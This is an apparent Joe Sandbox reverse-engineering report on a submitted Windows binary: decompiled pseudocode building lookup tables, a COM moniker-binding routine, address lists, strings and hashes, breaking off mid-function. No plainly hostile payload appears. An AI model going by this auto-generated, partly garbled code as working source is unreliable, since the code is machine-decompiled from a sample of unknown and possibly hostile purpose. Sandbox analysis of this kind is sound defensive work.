				 *((intOrPtr*)(__ecx)) = 0x145;
				 *((intOrPtr*)(__ecx + 4)) = 0x82;
				 *((intOrPtr*)(__ecx + 8)) = 0x28;
				_t218 = 0;
				 *(_t589 + 0x18) = __ecx + 0xc;
				goto L1;
				L31:
				 *(_t589 + 0x18) =  &(( *(_t589 + 0x18))[1]);
				_t218 =  &(1[_t218]);
				if(_t218 < 0x200) {
					L1:
					_t286 = ((_t565[2] & _t218) >> 0x00000008 & 0x00000001) + ((_t565[2] & _t218) >> 0x00000007 & 0x00000001) + ((_t565[2] & _t218) >> 0x00000006 & 0x00000001) + (_t153 >> 0x00000005 & 0x00000001) + (_t153 >> 0x00000004 & 0x00000001) + (_t153 >> 0x00000003 & 0x00000001) + (_t153 >> 0x00000002 & 0x00000001) + (_t153 >> 0x00000001 & 0x00000001) + (_t153 & 0x00000001);
					_t409 = ((_t565[1] & _t218) >> 0x00000008 & 0x00000001) + ((_t565[1] & _t218) >> 0x00000007 & 0x00000001) + ((_t565[1] & _t218) >> 0x00000006 & 0x00000001) + (_t156 >> 0x00000005 & 0x00000001) + (_t156 >> 0x00000004 & 0x00000001) + (_t156 >> 0x00000003 & 0x00000001) + (_t156 >> 0x00000002 & 0x00000001) + (_t156 >> 0x00000001 & 0x00000001) + (_t156 & 0x00000001);
					_t526 = (( *_t565 & _t218) >> 0x00000008 & 0x00000001) + (( *_t565 & _t218) >> 0x00000007 & 0x00000001) + (( *_t565 & _t218) >> 0x00000006 & 0x00000001) + (_t159 >> 0x00000005 & 0x00000001) + (_t159 >> 0x00000004 & 0x00000001) + (_t159 >> 0x00000003 & 0x00000001) + (_t159 >> 0x00000002 & 0x00000001) + (_t159 >> 0x00000001 & 0x00000001) + (_t159 & 0x00000001);
					if(_t286 != 2) {
						__eflags = _t286 - 1;
						if(_t286 != 1) {
							__eflags = _t286;
							if(_t286 == 0) {
								__eflags = _t409 - 2;
								if(_t409 != 2) {
									__eflags = _t409 - 1;
									if(_t409 != 1) {
										__eflags = _t409;
										if(_t409 == 0) {
											__eflags = _t526 - 2;
											if(_t526 < 2) {
												__eflags = _t526 - 1;
												if(_t526 != 1) {
													__eflags = _t526;
													if(_t526 == 0) {
														_t461 =  *(_t589 + 0x18);
														 *( *(_t589 + 0x18)) = _t526;
														_t183 =  *0x462720; // 0x1
														__eflags = _t183;
														if(_t183 == 0) {
															E00404860(_t589 + 0x8c, "sum");
															 *(_t589 + 0xb4) = _t526;
															E00404860(_t589 + 0x54, "string");
															_t591 = _t589 - 0x1c;
															 *((intOrPtr*)(_t591 + 0x3c)) = _t591;
															 *((char*)(_t591 + 0xd0)) = 1;
															E00404860(_t591, "Format");
															_t187 = L00407C50(_t591, _t624);
															_push(0x14);
															_t493 = _t187;
															_t188 = E00422C34(_t461, _t493, _t526, __eflags);
															_t592 = _t591 + 0x20;
															 *(_t592 + 0x20) = _t188;
															 *((char*)(_t592 + 0xb0)) = 2;
															__eflags = _t188;
															if(_t188 == 0) {
																_t563 = 0;
																__eflags = 0;
															} else {
																_t563 = E00410090(_t188, "Output");
															}
															 *((char*)(_t592 + 0xb0)) = 1;
															_t189 = E0040FF20(_t563, _t461, _t493, _t563, __eflags); // executed
															__eflags = _t189;
															if(__eflags == 0) {
																E0040EF20(_t218, _t563, _t493, __eflags, _t592 + 0x30); // executed
																_t593 = _t592 - 0x10;
																 *((intOrPtr*)(_t593 + 0x30)) = _t593;
																 *((char*)(_t593 + 0xc4)) = 3;
																E00406440(_t593, _t593 + 0x40);
																_t594 = _t593 - 0x1c;
																 *((intOrPtr*)(_t594 + 0x58)) = _t594;
																 *((char*)(_t594 + 0xe0)) = 4;
																E00404860(_t594, "summary");
																_t595 = _t594 - 0x1c;
																 *((intOrPtr*)(_t595 + 0x6c)) = _t595;
																 *((char*)(_t595 + 0xfc)) = 5;
																E00404800(_t595, _t595 + 0x98);
																_push(_t493);
																 *((char*)(_t595 + 0xfc)) = 3;
																E00407670(_t565);
																_t592 = _t595 + 0x4c;
																__eflags =  *((intOrPtr*)(_t595 + 0x80)) -  *((intOrPtr*)(_t595 + 0x7c)) & 0xfffffffc;
																if(__eflags != 0) {
																	E0040FC20(_t218, _t563, _t493, __eflags, _t592 + 0x40);
																	_t596 = _t592 - 0x10;
																	 *((intOrPtr*)(_t596 + 0x34)) = _t596;
																	 *((char*)(_t596 + 0xc4)) = 6;
																	E00406440(_t596, _t596 + 0x50);
																	_t597 = _t596 - 0x1c;
																	 *((intOrPtr*)(_t597 + 0x58)) = _t597;
																	 *((char*)(_t597 + 0xe0)) = 7;
																	E00404860(_t597, "extensions");
																	_t598 = _t597 - 0x1c;
																	 *((intOrPtr*)(_t598 + 0x68)) = _t598;
																	 *((char*)(_t598 + 0xfc)) = 8;
																	E00404800(_t598, _t598 + 0x98);
																	 *((char*)(_t598 + 0xfc)) = 6;
																	E00407670(_t565);
																	_t599 = _t598 + 0x4c;
																	E00404860(_t599 + 0x70, "name");
																	_t592 = _t599 - 0x1c;
																	 *((intOrPtr*)(_t592 + 0x40)) = _t592;
																	 *((char*)(_t592 + 0xd0)) = 9;
																	E00404800(_t592, _t592 + 0x88);
																	E0040FCE0(_t563, _t493, _t563, "file", _t493);
																	E004034C0(_t592 + 0x6c);
																	E00403570(_t592 + 0x40);
																}
																E00403570(_t592 + 0x30);
															}
															E004034C0(_t592 + 0x50);
															 *((intOrPtr*)(_t592 + 0xb0)) = 0xffffffff;
															E004034C0(_t592 + 0x88);
															E0040AC10(_t218, _t493, _t563, _t624, GetModuleHandleA(0));
															_t589 = _t592 + 4;
															 *0x462720 = 1;
														}
													}
												} else {
													 *( *(_t589 + 0x18)) = _t526;
												}
											} else {
												 *( *(_t589 + 0x18)) = 2;
											}
										}
									} else {
										 *( *(_t589 + 0x18)) = 3;
									}
								} else {
									 *( *(_t589 + 0x18)) = 4;
								}
							}
						} else {
							__eflags = _t409 - _t286;
							if(_t409 < _t286) {
								__eflags = _t409;
								if(_t409 == 0) {
									__eflags = _t526 - 1;
									if(_t526 < 1) {
										__eflags = _t526;
										if(_t526 == 0) {
											 *( *(_t589 + 0x18)) = 5;
										}
									} else {
										 *( *(_t589 + 0x18)) = 6;
									}
								}
							} else {
								 *( *(_t589 + 0x18)) = 7;
							}
						}
					} else {
						 *( *(_t589 + 0x18)) = 8;
					}
					goto L31;
				} else {
					_t489 = 0;
					_t219 =  &(_t565[0x203]);
					do {
						_t420 = ((_t565[2] & _t489) >> 0x00000008 & 0x00000001) + ((_t565[2] & _t489) >> 0x00000007 & 0x00000001) + ((_t565[2] & _t489) >> 0x00000006 & 0x00000001) + (_t162 >> 0x00000005 & 0x00000001) + (_t162 >> 0x00000004 & 0x00000001) + (_t162 >> 0x00000003 & 0x00000001) + (_t162 >> 0x00000002 & 0x00000001) + (_t162 >> 0x00000001 & 0x00000001) + (_t162 & 0x00000001);
						_t318 = ((_t565[1] & _t489) >> 0x00000008 & 0x00000001) + ((_t565[1] & _t489) >> 0x00000007 & 0x00000001) + ((_t565[1] & _t489) >> 0x00000006 & 0x00000001) + (_t165 >> 0x00000005 & 0x00000001) + (_t165 >> 0x00000004 & 0x00000001) + (_t165 >> 0x00000003 & 0x00000001) + (_t165 >> 0x00000002 & 0x00000001) + (_t165 >> 0x00000001 & 0x00000001) + (_t165 & 0x00000001);
						_t558 = (( *_t565 & _t489) >> 0x00000008 & 0x00000001) + (( *_t565 & _t489) >> 0x00000007 & 0x00000001) + (( *_t565 & _t489) >> 0x00000006 & 0x00000001) + (_t168 >> 0x00000005 & 0x00000001) + (_t168 >> 0x00000004 & 0x00000001) + (_t168 >> 0x00000003 & 0x00000001) + (_t168 >> 0x00000002 & 0x00000001) + (_t168 >> 0x00000001 & 0x00000001) + (_t168 & 0x00000001);
						if(_t318 != 2) {
							__eflags = _t420 - 1;
							if(_t420 < 1) {
								L38:
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 2;
									if(_t420 != 2) {
										__eflags = _t420 - 1;
										if(_t420 == 1) {
											__eflags = _t318;
											if(_t318 == 0) {
												 *_t219 = 3;
											}
										}
									} else {
										__eflags = _t318;
										if(_t318 == 0) {
											 *_t219 = 4;
										}
									}
								} else {
									__eflags = _t318 - 1;
									if(_t318 != 1) {
										__eflags = _t318;
										if(_t318 == 0) {
											__eflags = _t558 - 2;
											if(_t558 < 2) {
												__eflags = _t558 - 1;
												if(_t558 != 1) {
													__eflags = _t558;
													if(_t558 == 0) {
														 *_t219 = _t558;
													}
												} else {
													 *_t219 = _t558;
												}
											} else {
												 *_t219 = 2;
											}
										}
									} else {
										__eflags = _t558 - _t318;
										if(_t558 < _t318) {
											__eflags = _t558;
											if(_t558 == 0) {
												 *_t219 = 5;
											}
										} else {
											 *_t219 = 6;
										}
									}
								}
								goto L57;
							}
							__eflags = _t318 - 1;
							if(_t318 != 1) {
								goto L38;
							}
							 *_t219 = 7;
							goto L57;
						}
						 *_t219 = 8;
						L57:
						_t565 =  *(_t589 + 0x28);
						_t489 =  &(1[_t489]);
						_t219 =  &(_t219[1]);
					} while (_t489 < 0x200);
					_t559 = 0;
					_t490 =  &(_t565[0x403]);
					do {
						_t171 = _t565[2] & _t559;
						_t174 = _t565[1] & _t559;
						_t177 =  *_t565 & _t559;
						_t453 = ((_t565[1] & _t559) >> 0x00000008 & 0x00000001) + ((_t565[1] & _t559) >> 0x00000007 & 0x00000001) + (_t174 >> 0x00000006 & 0x00000001) + (_t174 >> 0x00000005 & 0x00000001) + (_t174 >> 0x00000004 & 0x00000001) + (_t174 >> 0x00000003 & 0x00000001) + (_t174 >> 0x00000002 & 0x00000001) + (_t174 >> 0x00000001 & 0x00000001) + (_t174 & 0x00000001) + ((_t565[2] & _t559) >> 0x00000008 & 0x00000001) + ((_t565[2] & _t559) >> 0x00000007 & 0x00000001) + (_t171 >> 0x00000006 & 0x00000001) + (_t171 >> 0x00000005 & 0x00000001) + (_t171 >> 0x00000004 & 0x00000001) + (_t171 >> 0x00000003 & 0x00000001) + (_t171 >> 0x00000002 & 0x00000001) + (_t171 >> 0x00000001 & 0x00000001) + (_t171 & 0x00000001);
						_t340 = (( *_t565 & _t559) >> 0x00000008 & 0x00000001) + (( *_t565 & _t559) >> 0x00000007 & 0x00000001) + (_t177 >> 0x00000006 & 0x00000001) + (_t177 >> 0x00000005 & 0x00000001) + (_t177 >> 0x00000004 & 0x00000001) + (_t177 >> 0x00000003 & 0x00000001) + (_t177 >> 0x00000002 & 0x00000001) + (_t177 >> 0x00000001 & 0x00000001) + (_t177 & 0x00000001);
						if(_t340 < 3) {
							__eflags = _t453 - 1;
							if(_t453 < 1) {
								L64:
								__eflags = _t453;
								if(_t453 != 0) {
									__eflags = _t453 - 2;
									if(_t453 < 2) {
										L70:
										__eflags = _t453 - 1;
										if(_t453 != 1) {
											__eflags = _t453 - 2;
											if(_t453 >= 2) {
												__eflags = _t340;
												if(_t340 == 0) {
													 *_t490 = 2;
												}
											}
										} else {
											__eflags = _t340 - _t453;
											if(_t340 != _t453) {
												__eflags = _t340;
												if(_t340 == 0) {
													 *_t490 = 1;
												}
											} else {
												 *_t490 = 4;
											}
										}
										goto L82;
									}
									__eflags = _t340 - 1;
									if(_t340 != 1) {
										goto L70;
									}
									 *_t490 = 5;
									goto L82;
								}
								__eflags = _t340 - 2;
								if(_t340 != 2) {
									__eflags = _t340 - 1;
									if(_t340 != 1) {
										__eflags = _t340;
										if(_t340 == 0) {
											 *_t490 = _t340;
										}
									} else {
										 *_t490 = 3;
									}
								} else {
									 *_t490 = 6;
								}
								goto L82;
							}
							__eflags = _t340 - 2;
							if(_t340 != 2) {
								goto L64;
							}
							 *_t490 = 7;
							goto L82;
						}
						 *_t490 = 8;
						L82:
						_t559 =  &(1[_t559]);
						_t490 =  &(_t490[1]);
					} while (_t559 < 0x200);
					_t179 = 0;
					_t560 = _t559 | 0xffffffff;
					do {
						 *((char*)(_t589 + 0x17)) = (_t179 & 0x00000080) != 0;
						 *(_t589 + 0x1e) = _t179 >> 0x00000002 & 0x00000001;
						 *(_t589 + 0x1f) = _t179 >> 0x00000003 & 0x00000001;
						 *(_t589 + 0x15) = _t179 >> 0x00000004 & 0x00000001;
						 *(_t589 + 0x16) = _t179 & 0x00000001;
						_t459 = _t179 >> 0x00000005 & 0x00000001;
						_t272 = _t179 >> 0x00000001 & 0x00000001;
						if((_t179 >> 0x00000006 & 0x00000001) == 0) {
							__eflags =  *(_t589 + 0x15);
							if( *(_t589 + 0x15) == 0) {
								L91:
								 *(_t565 + 0x180c + _t179 * 4) = 0;
								L92:
								if( *(_t589 + 0x1e) == 0) {
									__eflags =  *(_t589 + 0x16);
									if( *(_t589 + 0x16) == 0) {
										L111:
										 *(_t565 + 0x1c0c + _t179 * 4) = 0;
										goto L112;
									}
									__eflags = _t272;
									if(_t272 != 0) {
										L128:
										 *(_t565 + 0x1c0c + _t179 * 4) = _t560;
										goto L112;
									}
									 *(_t565 + 0x1c0c + _t179 * 4) = 1;
									goto L112;
								}
								_t460 =  *(_t589 + 0x1f);
								_t349 =  *(_t589 + 0x16);
								if(_t460 != 0) {
									__eflags = _t349;
									if(_t349 == 0) {
										L120:
										__eflags = _t460;
										if(_t460 == 0) {
											__eflags = _t349;
											if(_t349 != 0) {
												L126:
												__eflags = _t460;
												if(_t460 == 0) {
													goto L112;
												}
												__eflags = _t349;
												if(_t349 != 0) {
													goto L112;
												}
												goto L128;
											}
											 *(_t565 + 0x1c0c + _t179 * 4) = 1;
											goto L112;
										}
										__eflags = _t349;
										if(_t349 == 0) {
											goto L126;
										}
										__eflags = _t272;
										if(_t272 == 0) {
											goto L126;
										}
										 *(_t565 + 0x1c0c + _t179 * 4) = _t560;
										goto L112;
									}
									__eflags = _t272;
									if(_t272 != 0) {
										goto L120;
									}
									goto L111;
								}
								if(_t349 == 0) {
									goto L120;
								}
								if(_t272 != 0) {
									goto L111;
								}
								 *(_t565 + 0x1c0c + _t179 * 4) = 1;
								goto L112;
							}
							__eflags = _t459;
							if(_t459 != 0) {
								L108:
								 *(_t565 + 0x180c + _t179 * 4) = _t560;
								goto L92;
							}
							 *(_t565 + 0x180c + _t179 * 4) = 1;
							goto L92;
						}
						if( *((char*)(_t589 + 0x17)) != 0) {
							__eflags =  *(_t589 + 0x15);
							if( *(_t589 + 0x15) == 0) {
								L100:
								__eflags =  *((char*)(_t589 + 0x17));
								_t350 =  *(_t589 + 0x15);
								if( *((char*)(_t589 + 0x17)) == 0) {
									__eflags = _t350;
									if(_t350 != 0) {
										L106:
										__eflags =  *((char*)(_t589 + 0x17));
										if( *((char*)(_t589 + 0x17)) == 0) {
											goto L92;
										}
										__eflags = _t350;
										if(_t350 != 0) {
											goto L92;
										}
										goto L108;
									}
									 *(_t565 + 0x180c + _t179 * 4) = 1;
									goto L92;
								}
								__eflags = _t350;
								if(_t350 == 0) {
									goto L106;
								}
								__eflags = _t459;
								if(_t459 == 0) {
									goto L106;
								}
								 *(_t565 + 0x180c + _t179 * 4) = _t560;
								goto L92;
							}
							__eflags = _t459;
							if(_t459 != 0) {
								goto L100;
							}
							goto L91;
						}
						if( *(_t589 + 0x15) == 0) {
							goto L100;
						}
						if(_t459 != 0) {
							goto L91;
						}
						 *(_t565 + 0x180c + _t179 * 4) = 1;
						goto L92;
						L112:
						_t179 =  &(1[_t179]);
					} while (_t179 < 0x100);
					_t180 =  &(_t565[0x603]);
					_t273 = 0x100;
					do {
						_t344 = _t180[0x100];
						if(_t344 != 1) {
							L132:
							_t460 = 0;
							__eflags = 0;
							L133:
							__eflags = _t344 - 1;
							if(_t344 != 1) {
								L136:
								__eflags = _t344 - _t460;
								if(_t344 != _t460) {
									L145:
									__eflags = _t344 - 0xffffffff;
									if(_t344 != 0xffffffff) {
										goto L155;
									}
									__eflags =  *_t180 - 1;
									if( *_t180 != 1) {
										__eflags = _t344 - 0xffffffff;
										if(_t344 != 0xffffffff) {
											goto L155;
										}
										__eflags =  *_t180 - _t460;
										if( *_t180 != _t460) {
											__eflags = _t344 - 0xffffffff;
											if(_t344 != 0xffffffff) {
												goto L155;
											}
											__eflags =  *_t180 - _t344;
											if( *_t180 != _t344) {
												goto L155;
											}
											_t180[0x300] = 1;
											L154:
											_t180[0x200] = 0xd;
											goto L155;
										}
										_t180[0x200] = 0xc;
										_t180[0x300] = 1;
										goto L155;
									}
									_t180[0x200] = 0xb;
									_t180[0x300] = 1;
									goto L155;
								}
								__eflags =  *_t180 - 1;
								if( *_t180 != 1) {
									__eflags = _t344 - _t460;
									if(_t344 != _t460) {
										goto L145;
									}
									__eflags =  *_t180 - _t460;
									if( *_t180 != _t460) {
										__eflags = _t344 - _t460;
										if(_t344 != _t460) {
											goto L145;
										}
										__eflags =  *_t180 - 0xffffffff;
										if( *_t180 != 0xffffffff) {
											goto L145;
										}
										_t180[0x200] = 0xa;
										_t180[0x300] = 1;
										goto L155;
									}
									_t180[0x200] = 9;
									_t180[0x300] = _t460;
									goto L155;
								}
								_t180[0x200] = 0xa;
								_t180[0x300] = _t460;
								goto L155;
							}
							__eflags =  *_t180 - 0xffffffff;
							if( *_t180 != 0xffffffff) {
								goto L136;
							}
							_t180[0x200] = 0xb;
							_t180[0x300] = _t460;
							goto L155;
						}
						if( *_t180 != 1) {
							__eflags = _t344 - 1;
							if(_t344 != 1) {
								goto L132;
							}
							_t460 = 0;
							__eflags =  *_t180;
							if( *_t180 != 0) {
								goto L133;
							}
							_t180[0x200] = 0xc;
							_t180[0x300] = 0;
							goto L155;
						}
						_t180[0x300] = 0;
						goto L154;
						L155:
						_t180 =  &(_t180[1]);
						_t273 = _t273 - 1;
					} while (_t273 != 0);
					 *[fs:0x0] =  *((intOrPtr*)(_t589 + 0xa8));
					_pop(_t492);
					_pop(_t562);
					_pop(_t274);
					return E004230EF(_t565, _t274,  *(_t589 + 0x90) ^ _t589, _t460, _t492, _t562);
				}
			}

0x00407df0
0x00407df0
0x00407df2
0x00407dfd
0x00407dfe
0x00407e04
0x00407e0b
0x00407e16
0x00407e1d
0x00407e25
0x00407e2b
0x00407e30
0x00407e34
0x00407e3b
0x00407e42
0x00407e49
0x00407e4b
0x00407e4b
0x0040823a
0x0040823a
0x0040823f
0x00408246
0x00407e50
0x00407ea5
0x00407efc
0x00407f53
0x00407f58
0x00407f69
0x00407f6c
0x00407fb4
0x00407fb6
0x00407fbc
0x00407fbf
0x00407fd0
0x00407fd3
0x00407fe4
0x00407fe6
0x00407fec
0x00407fef
0x00408000
0x00408003
0x00408010
0x00408012
0x00408018
0x0040801c
0x0040801e
0x00408023
0x00408025
0x00408037
0x00408045
0x0040804c
0x00408051
0x00408056
0x0040805f
0x00408067
0x0040806c
0x00408071
0x00408073
0x00408075
0x0040807a
0x0040807d
0x00408081
0x00408089
0x0040808b
0x0040809d
0x0040809d
0x0040808d
0x00408099
0x00408099
0x004080a1
0x004080a9
0x004080ae
0x004080b0
0x004080bd
0x004080c2
0x004080cb
0x004080d0
0x004080d8
0x004080dd
0x004080e2
0x004080eb
0x004080f3
0x004080f8
0x00408104
0x00408109
0x00408111
0x00408116
0x00408117
0x0040811f
0x0040812f
0x00408132
0x00408138
0x00408145
0x0040814a
0x00408153
0x00408158
0x00408160
0x00408165
0x0040816a
0x00408173
0x0040817b
0x00408180
0x0040818c
0x00408191
0x00408199
0x0040819f
0x004081a7
0x004081ac
0x004081b8
0x004081bd
0x004081c9
0x004081ce
0x004081d6
0x004081e2
0x004081eb
0x004081f4
0x004081f4
0x004081fd
0x004081fd
0x00408206
0x00408212
0x0040821d
0x0040822b
0x00408230
0x00408233
0x00408233
0x00408025
0x00408005
0x00408009
0x00408009
0x00407ff1
0x00407ff5
0x00407ff5
0x00407fef
0x00407fd5
0x00407fd9
0x00407fd9
0x00407fc1
0x00407fc5
0x00407fc5
0x00407fbf
0x00407f6e
0x00407f6e
0x00407f70
0x00407f81
0x00407f83
0x00407f89
0x00407f8c
0x00407f9d
0x00407f9f
0x00407fa9
0x00407fa9
0x00407f8e
0x00407f92
0x00407f92
0x00407f8c
0x00407f72
0x00407f76
0x00407f76
0x00407f70
0x00407f5a
0x00407f5e
0x00407f5e
0x00000000
0x0040824c
0x0040824c
0x0040824e
0x00408254
0x004082a9
0x00408300
0x00408357
0x0040835c
0x00408366
0x00408369
0x00408378
0x00408378
0x0040837a
0x00408399
0x0040839c
0x004083aa
0x004083ad
0x004083af
0x004083b1
0x004083b3
0x004083b3
0x004083b1
0x0040839e
0x0040839e
0x004083a0
0x004083a2
0x004083a2
0x004083a0
0x0040837c
0x0040837c
0x0040837f
0x004083bb
0x004083bd
0x004083bf
0x004083c2
0x004083cc
0x004083cf
0x004083d5
0x004083d7
0x004083d9
0x004083d9
0x004083d1
0x004083d1
0x004083d1
0x004083c4
0x004083c4
0x004083c4
0x004083c2
0x00408381
0x00408381
0x00408383
0x0040838d
0x0040838f
0x00408391
0x00408391
0x00408385
0x00408385
0x00408385
0x00408383
0x0040837f
0x00000000
0x0040837a
0x0040836b
0x0040836e
0x00000000
0x00000000
0x00408370
0x00000000
0x00408370
0x0040835e
0x004083db
0x004083db
0x004083df
0x004083e0
0x004083e3
0x004083ef
0x004083f1
0x004083f7
0x004083fa
0x00408451
0x004084a8
0x004084aa
0x004084fc
0x00408501
0x0040850b
0x0040850e
0x0040851d
0x0040851d
0x0040851f
0x0040852e
0x00408531
0x00408540
0x00408540
0x00408543
0x0040855e
0x00408561
0x00408563
0x00408565
0x00408567
0x00408567
0x00408565
0x00408545
0x00408545
0x00408547
0x0040856f
0x00408571
0x00408573
0x00408573
0x00408549
0x00408549
0x00408549
0x00408547
0x00000000
0x00408543
0x00408533
0x00408536
0x00000000
0x00000000
0x00408538
0x00000000
0x00408538
0x00408521
0x00408524
0x00408551
0x00408554
0x0040857b
0x0040857d
0x0040857f
0x0040857f
0x00408556
0x00408556
0x00408556
0x00408526
0x00408526
0x00408526
0x00000000
0x00408524
0x00408510
0x00408513
0x00000000
0x00000000
0x00408515
0x00000000
0x00408515
0x00408503
0x00408581
0x00408581
0x00408582
0x00408585
0x00408591
0x00408593
0x00408596
0x0040859d
0x004085aa
0x004085b6
0x004085c7
0x004085cb
0x004085d8
0x004085db
0x004085e1
0x00408648
0x0040864d
0x0040860d
0x0040860d
0x00408618
0x0040861d
0x004086f9
0x004086fe
0x004086ac
0x004086ac
0x00000000
0x004086ac
0x00408700
0x00408702
0x00408747
0x00408747
0x00000000
0x00408747
0x00408704
0x00000000
0x00408704
0x00408623
0x00408627
0x0040862d
0x004086a4
0x004086a6
0x00408711
0x00408711
0x00408713
0x00408726
0x00408728
0x00408737
0x00408737
0x00408739
0x00000000
0x00000000
0x0040873f
0x00408741
0x00000000
0x00000000
0x00000000
0x00408741
0x0040872a
0x00000000
0x0040872a
0x00408715
0x00408717
0x00000000
0x00000000
0x00408719
0x0040871b
0x00000000
0x00000000
0x0040871d
0x00000000
0x0040871d
0x004086a8
0x004086aa
0x00000000
0x00000000
0x00000000
0x004086aa
0x00408631
0x00000000
0x00000000
0x00408639
0x00000000
0x00000000
0x0040863b
0x00000000
0x0040863b
0x0040864f
0x00408651
0x00408698
0x00408698
0x00000000
0x00408698
0x00408653
0x00000000
0x00408653
0x004085e8
0x00408602
0x00408607
0x00408660
0x00408660
0x00408665
0x00408669
0x0040867c
0x0040867e
0x0040868d
0x0040868d
0x00408692
0x00000000
0x00000000
0x00408694
0x00408696
0x00000000
0x00000000
0x00000000
0x00408696
0x00408680
0x00000000
0x00408680
0x0040866b
0x0040866d
0x00000000
0x00000000
0x0040866f
0x00408671
0x00000000
0x00000000
0x00408673
0x00000000
0x00408673
0x00408609
0x0040860b
0x00000000
0x00000000
0x00000000
0x0040860b
0x004085ef
0x00000000
0x00000000
0x004085f3
0x00000000
0x00000000
0x004085f5
0x00000000
0x004086b7
0x004086b7
0x004086b8
0x004086c3
0x004086c9
0x004086d3
0x004086d3
0x004086e0
0x00408772
0x00408772
0x00408772
0x00408774
0x00408774
0x00408776
0x00408792
0x00408792
0x00408794
0x004087dc
0x004087dc
0x004087df
0x00000000
0x00000000
0x004087e1
0x004087e3
0x004087f7
0x004087fa
0x00000000
0x00000000
0x004087fc
0x004087fe
0x00408812
0x00408815
0x00000000
0x00000000
0x00408817
0x00408819
0x00000000
0x00000000
0x0040881b
0x00408821
0x00408821
0x00000000
0x00408821
0x00408800
0x0040880a
0x00000000
0x0040880a
0x004087e5
0x004087ef
0x00000000
0x004087ef
0x00408796
0x00408798
0x004087ab
0x004087ad
0x00000000
0x00000000
0x004087af
0x004087b1
0x004087c5
0x004087c7
0x00000000
0x00000000
0x004087c9
0x004087cc
0x00000000
0x00000000
0x004087ce
0x004087d4
0x00000000
0x004087d4
0x004087b3
0x004087bd
0x00000000
0x004087bd
0x0040879a
0x004087a0
0x00000000
0x004087a0
0x00408778
0x0040877b
0x00000000
0x00000000
0x0040877d
0x00408787
0x00000000
0x00408787
0x004086e8
0x00408753
0x00408755
0x00000000
0x00000000
0x00408757
0x00408759
0x0040875b
0x00000000
0x00000000
0x0040875d
0x00408767
0x00000000
0x00408767
0x004086ea
0x00000000
0x0040882b
0x0040882b
0x0040882e
0x0040882e
0x0040883f
0x00408847
0x00408848
0x0040884a
0x0040885f
0x0040885f

Strings

string, xrefs: 0040803C
Format, xrefs: 0040805A
file, xrefs: 004081DB
name, xrefs: 004081AF
(, xrefs: 00407E42
sum, xrefs: 0040802B
extensions, xrefs: 0040816E
Output, xrefs: 0040808D
summary, xrefs: 004080E6

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID: ($Format$Output$extensions$file$name$string$sum$summary
API String ID: 0-2121278597
Opcode ID: 51cb2b24f9f94a56237fc899e84429b006b710014a5dca0883915ba8021c4648
Instruction ID: 47d6beaa62b9e3c373e1cc66324ac0c3981bf147a94dc25d6fa1eb9f8f1af694
Opcode Fuzzy Hash: 51cb2b24f9f94a56237fc899e84429b006b710014a5dca0883915ba8021c4648
Instruction Fuzzy Hash: B35249F3E047018BDB258A24CD5436A76C1BBE5319F5E897FDC85A33C1FABA49048786

Uniqueness

Uniqueness Score: -1.00%

Function 00408870 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00408870(void* __ebp) {
				signed int _v4;
				signed int _v60;
				void _v96;
				char _v104;
				void* _v108;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr* _v152;
				intOrPtr* _v156;
				signed int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				intOrPtr* _t118;
				signed char _t120;
				signed int _t121;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				signed int _t142;
				signed char _t151;
				signed int _t179;
				signed int _t197;
				intOrPtr _t200;
				signed int _t202;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				void* _t218;

				_t215 =  &_v108;
				_t61 =  *0x4608e0; // 0xb51ec2b3
				_v4 = _t61 ^ _t215;
				__imp__CoInitialize(0); // executed
				memcpy( &_v96, L"clsid:10000002-0000-0000-0000-000000000001", 0x15 << 2);
				_t216 = _t215 + 0xc;
				asm("movsw");
				__imp__CreateBindCtx(0,  &_v108);
				__imp__MkParseDisplayName(_v116,  &_v104,  &_v108,  &_v112); // executed
				_t66 = _v128;
				 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0x20))))(_t66, _v132, 0, 0x451bc0,  &_v136); // executed
				if( *0x463210 != 0) {
					_t118 = _v156;
					 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))(_t118);
				}
				_t68 = _v152;
				 *((intOrPtr*)( *((intOrPtr*)( *_t68 + 8))))(_t68); // executed
				_t70 = _v152;
				 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
				_t213 =  *0x4631dc; // 0x2ad58
				_t72 =  *0x4631d8 & 0x0000ffff;
				_t202 =  *0x463200; // 0x211
				_t120 =  *0x463208; // 0x0
				_t197 =  *0x4631e4; // 0x0
				_v164 = _t72;
				_t73 =  *0x462f78; // 0x0
				 *0x462f80 = _t73 * _t202 -  *0x4631f4;
				 *0x460334 =  *0x460334 + ( *0x462b3c & 0x0000ffff) + (_t213 & 0x0000ffff) - 0x20 *  *0x462b40 + _t72 +  *0x4631e8;
				_t218 =  *0x462f68 - _t202; // 0x211
				if(_t218 != 0) {
					asm("cdq");
					_t20 = _t197 + 0x44; // 0x44
					 *0x462f84 = _t120 / _t20 + _t197 + _t213;
				}
				_t134 =  *0x462b44; // 0x0
				_t76 =  *0x4631e8; // 0x789
				asm("cdq");
				_t25 = _t197 + 0x51; // 0x51
				_t139 = _t134 * _t197 - _t120 - _t202 -  *0x4631d8 +  *0x462f64;
				 *0x462b40 = _t139;
				_t214 =  *0x462b3c; // 0x0
